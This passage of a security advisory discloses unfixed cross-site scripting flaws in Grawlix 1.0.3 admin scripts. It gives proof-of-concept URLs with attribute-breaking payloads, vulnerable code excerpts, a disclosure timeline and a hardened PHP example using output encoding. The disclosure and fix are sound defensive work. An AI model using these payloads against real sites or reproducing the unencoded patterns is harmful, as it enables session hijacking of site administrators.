$_GET|';print_r($_GET);echo '|';

XSS 3

The edit_id parameter of site.nav-edit.ajax.php is vulnerable to XSS.

Proof of Concept:

http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id=">

Code:

_admin/site.nav-edit.ajax.php

$edit_id = $_GET['edit_id'];
[...]
$modal->value($edit_id);

_admin/lib/GrlxForm.php

$this->value ? $value = ' value="'.$this->value.'"' : null;

XSS 4

When viewing the book overview, the start_sort_order parameter is vulnerable to XSS.

Proof of Concept:

http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order=" onmouseover="alert(1)

Code:

_admin/book.view.php

$delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order");

XSS 5 (limited)

In two scripts, the page_id value is put into a hidden input element without encoding quotes. It may be possible to execute JavaScript via a style element in older browsers.

Proof of Concept:

http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id=" style="STYLE
http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id=" style="STYLE

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference: http://ift.tt/1NCqGiG
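The root cause shared by XSS 3, 4 and 5 above is the same: a request parameter is concatenated into an HTML attribute (and, in XSS 4, into a query string inside an attribute) without output encoding, so a double quote in the value closes the attribute. The following is an added example, not Grawlix code: it reproduces the GrlxForm.php value() pattern as a hypothetical function beside an encoded version, and shows the corresponding treatment for the book.view.php delete link. The function names and the input string are assumptions made for this illustration.

```php
<?php
// Added example (not Grawlix code). Function names are hypothetical; the
// input below is a constructed string in the shape of the XSS 4 proof of concept.

// Vulnerable pattern from GrlxForm.php: the value is concatenated straight into
// the attribute, so a double quote in it ends the attribute and whatever follows
// is parsed as further attributes or markup.
function input_value_attr_unsafe(?string $value): string {
    return $value ? ' value="' . $value . '"' : '';
}

// Hardened version: htmlspecialchars with ENT_QUOTES encodes " ' < > and &,
// so the value cannot leave the quoted attribute. Encode at the point of
// output, keep the attribute quoted, and do not rely on input filtering alone.
function input_value_attr(?string $value): string {
    if ($value === null || $value === '') {
        return '';
    }
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return ' value="' . $encoded . '"';
}

// Same idea for a value that lands in a link's query string (book.view.php):
// first URL-encode it as a query component, then HTML-encode the whole href
// because it is being placed inside an attribute.
function delete_link_href(int $pageId, string $startSortOrder): string {
    $query = http_build_query([
        'delete_page_id'   => $pageId,
        'start_sort_order' => $startSortOrder,
    ]);
    return htmlspecialchars('book.view.php?' . $query, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed input, same shape as the XSS 4 proof of concept on this page.
$tainted = '" onmouseover="alert(1)';

// Unsafe: the quote in $tainted closes value="" and an event handler attribute
// is injected into the element.
echo '<input type="hidden" name="edit_id"' . input_value_attr_unsafe($tainted) . '>', PHP_EOL;

// Encoded: the quote becomes &quot; and the whole string stays inert attribute text.
echo '<input type="hidden" name="edit_id"' . input_value_attr($tainted) . '>', PHP_EOL;

// Encoded link: the tainted value is a harmless percent-encoded query parameter.
echo '<a href="' . delete_link_href(1, $tainted) . '">delete</a>', PHP_EOL;
```

Running the script with `php` and inspecting the three output lines shows the injected attribute in the first line and only encoded text in the other two.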